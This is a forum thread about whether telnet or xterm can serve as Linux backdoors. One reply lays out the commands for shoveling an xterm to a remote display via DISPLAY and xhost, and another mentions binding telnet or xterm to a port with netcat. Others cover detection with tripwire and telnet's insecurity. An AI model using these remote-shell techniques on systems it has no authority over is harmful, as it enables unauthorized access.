telnet/xterm backdoors??
Page 1 of 3 123 LastLast
Results 1 to 10 of 21

Thread: telnet/xterm backdoors??

  1. #1
    Senior Member br_fusion's Avatar
    Join Date
    Apr 2002
    Posts
    167

    telnet/xterm backdoors??

    Does anyone know if it is possible to make backdoors with telnet or xterm on a linux system. I somewhere read that you could make telnet spit out a /bin/sh to a remote host.

    Also I checked the man pages for both and found next to nothing

    thanks
    The command completed successfully.


    \"They drew first blood not me.\"

  2. #2
    Senior Member
    Join Date
    Jul 2003
    Posts
    114
    It's not a feature of telnet or xterm. Attackers replace the existing copies of the telnet/xterm/ssh/etc. programs with ones that more-or-less appear to work the same, but actually do something evil, in addition.

    Programs like tripwire will help detect these changes.

  3. #3
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Think you may be referring to shoveling an XTERM back. The person would have to obtain some kind of access to your system first, but if you do not have a firewall/router blocking outgoing connections, they could send an exterminal back to their own pc, in essentially one command.

    To test for yourself, goto system1:
    DISPLAY=<system2>:0.0; export DISPLAY

    system2:
    xhost +system1

    system1:
    xterm & (or whatever the binary is on your system).

    You should notice that the xterm from system1 now appeaers on system2 as would any gui window executed from the same shell where you set your DISPLAY environment variable. Can be nice, but can be painful too...

    Also note, you could do the same thing if the system had rexec or rcmd running (you do have to change up the command line to tell the system where to pipe the xterm, but it works nonetheless).

    I would assume this is roughly what you are asking?

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  4. #4
    Senior Member br_fusion's Avatar
    Join Date
    Apr 2002
    Posts
    167
    nebulus200 thanks for the help.

    Do you know any informative links where I could learn more?
    The command completed successfully.


    \"They drew first blood not me.\"

  5. #5
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Unfortunately no, most unix books should at least discuss it briefly...

    Here are the first few that turned up in google:

    http://www.bu.edu/cc/support/aboutun...ral/xterminal/
    http://bau2.uibk.ac.at/matic/xsecur.htm
    http://bau2.uibk.ac.at/matic/ccxsec.htm
    http://secinf.net/unix_security/Impr..._security.html

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  6. #6
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,884
    One place you can try is the Hacking Exposed 4 book by Foundstone. They discuss this in detail along with ways to prevent it. I know this isn't a link but I do know that the info you most likely want is in the book.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  7. #7
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    Posts
    4,325
    Thehorse13 is right, as usual. I read about that in Hacking Exposed. I have the third edition though.
    Maximum Linux Security also talks about it.

    It is also possible to use netcat to make telnet or xterm to listen on any port of the attackers choice...

    Most won't do this (hopefully)... as it will be open to anyone who tries to connect.
    Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you\'ve saved, how much you haven\'t smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.

  8. #8
    Senior Member
    Join Date
    Oct 2001
    Posts
    872
    Originally posted here by phishphreek80
    It is also possible to use netcat to make telnet or xterm to listen on any port of the attackers choice...

    Most won't do this (hopefully)... as it will be open to anyone who tries to connect. [/B]

    Yes, thats what I was exactly going to suggest to him!

    Netcat is a tool of wonders. You may want to do some research on Cryptcat and/or Socat.
    ...This Space For Rent.

    -[WebCarnage]

  9. #9
    Junior Member
    Join Date
    Nov 2003
    Posts
    2
    I don't know any thing on telneting.could someone please tell me what it is and how to do it?[it would be appretiated]{thanks}
    Kyle Goode

  10. #10
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    Posts
    4,325
    kyleiscool: You should do some searching of the forum, as this has been discussed time and time again. Below is a link to get you stared. The search feature is at the top right of the main page.

    You can also find a lot of good info about telnet by using www.google.com

    The main thing you need to know is DON'T USE IT ACROSS THE INTERNET!

    It is by NO means secure... everything can be captured.

    If you are just exploring and learning how protocols work.. then fine, it is good for that.
    BUT, thats about it.

    You can use it on your trusted LAN... but there are far better alternatives... such as ssh (secure shell).

    http://www.antionline.com/showthread...hreadid=251708

    PS: I hope that isn't your real address that you put in your "location field" of your profile. Everyone can see that. It isn't wise to put your personal info up for the world to see... you make yourself an easy target for identity theft. or.. psycho serial killers... muhahaha muhahaha

    wow... you're only 13-14yrs old? maybe its time your parents had a talk with you about what info NOT to give out while online. Its a very dangerous world... there are some very scary people out there. you should NEVER give out your info to ANYONE. Just like in the real world... you wouldn't tell a stranger where you live, would you?
    Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you\'ve saved, how much you haven\'t smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •